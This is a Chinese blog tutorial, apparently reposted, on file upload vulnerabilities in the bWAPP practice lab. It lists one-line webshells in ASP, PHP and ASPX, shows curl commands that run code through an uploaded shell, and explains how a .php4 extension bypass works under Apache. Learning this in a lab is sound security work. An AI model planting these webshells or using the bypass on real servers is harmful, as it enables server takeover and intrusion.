文章详情

短信预约-IT技能 免费直播动态提醒

请输入下面的图形验证码

提交验证

短信预约提醒成功

文件上传漏洞 (Part1)

2023-09-10 20:06

关注

使用的平台是BWAPP

正常的安装完 bwapp ,在文件上传模块能够成功上传文件,但文件却不可以被保存,原因是images文件夹的权限不够,解决方法:

docker exec -it 你的dockerID /bin/bash  #进入容器的指令cd app/chmod 777 images

如图:

image-20221019170801818

一句话木马

什么是一句话木马?

一句话木马短小精悍,而且功能强大,隐蔽性非常好,在入侵中始终扮演着强大的作用。

不同语言的一句话木马

  1. asp一句话木马
<%execute(request("value"))%>
  1. php一句话木马
 @eval($_POST['value']); ?>
  1. aspx一句话木马
<%@ Page Langeuage="Jscript"%><%eval(Request.Item['value'])%>
  1. 其他的一句话木马
<%eval request("value")%><%execute request("value")%><%exxecute(request("value"))%>

简单的文件上传漏洞,可以使用一句话木马获得到Webshell,进而获取更多的内容或权限。

可以使用curl中国菜刀蚁剑等工具继续接下来的操作。

比如,在终端使用curl即可webshell

curl -d "value=echo getcwd();" http://ip地址/上传的文件名# 返回结果/app/images,说明脚本是可以运行的

文件上传漏洞初阶:后缀名绕过

以下1.*文件的内容均为 [/scode]

直接上传 php 文件,则

image-20221019165407855

修改后缀名后即可成功上传

image-20221019191201002

同样的,点击here,和 low等级下一样,没有回显,和上面使用一样的方法,即curl

curl -d "flag=getcwd();" http://127.0.0.1/images/1.php4# 这样也是输出/app/images,说明 .php4 的文件和 .php文件的作用相同

如果继续修改文件后缀,直接改成.php30试一下,同样是上传成功,点击[tag type=“primary”]here[/tag]访问,会发现有回显,(和上传 .txt 文件的结果一毛一样)内容正是上传的文件内容。

这是为什么呢? 那是因为 .php30文件被认为是普通的文件,不能被执行。

那是因为.php30没有对应的语言解析模块。

接着往下看…

文件后缀名绕过的底层原理

想要了解到为什么会出现这种情况,可以通过bash命令对该漏洞容器进行深度调试来了解。

# 前面修改images文件夹的权限时使用过docker exec -it dockerID /bin/bash  # 进入到调试  ID可以通过docker ps获得

通过查看网络连接去查找该漏洞容器使用的Web服务器

netstat -antp | grep 80  # 查看80端口容器使用的Web服务器

image-20221019195254989

接下来去查看apache2的主要配置文件 ==> /etc/apache2/apache2.conf

cd /etc/apache2vim apache2.conf    # 需要安装vim,或者直接用cat查看

image-20221019200200752

由此处可以知,该Web服务器加载了mod-enabled下的模块,进入查看,发现有很多

image-20221019200649631

查看php5.conf文件,看第一行的正则表达式,也就是说,可以解析php,php3,php5等文件(但是php文件却被加到了黑名单),而我们之前上传的php30不在这些范围内,就没有语言解释器去进行解释运行。

image-20221019200858046

这就是一些简单的原理。

为获得更好的阅读体验,请移步Super

来源地址:https://blog.csdn.net/Che_ng/article/details/127415276

阅读原文内容投诉

免责声明:

① 本站未注明“稿件来源”的信息均来自网络整理。其文字、图片和音视频稿件的所属权归原作者所有。本站收集整理出于非商业性的教育和科研之目的,并不意味着本站赞同其观点或证实其内容的真实性。仅作为临时的测试数据,供内部测试之用。本站并未授权任何人以任何方式主动获取本站任何信息。

② 本站未注明“稿件来源”的临时测试数据将在测试完成后最终做删除处理。有问题或投稿请发送至: 邮箱/279061341@qq.com QQ/279061341

软考中级精品资料免费领

  • 历年真题答案解析
  • 备考技巧名师总结
  • 高频考点精准押题
  • 2024年上半年信息系统项目管理师第二批次真题及答案解析(完整版)

    难度     813人已做
    查看
  • 【考后总结】2024年5月26日信息系统项目管理师第2批次考情分析

    难度     354人已做
    查看
  • 【考后总结】2024年5月25日信息系统项目管理师第1批次考情分析

    难度     318人已做
    查看
  • 2024年上半年软考高项第一、二批次真题考点汇总(完整版)

    难度     435人已做
    查看
  • 2024年上半年系统架构设计师考试综合知识真题

    难度     224人已做
    查看

相关文章

发现更多好内容

猜你喜欢

AI推送时光机
位置:首页-资讯-后端开发
咦!没有更多了?去看看其它编程学习网 内容吧
首页课程
资料下载
问答资讯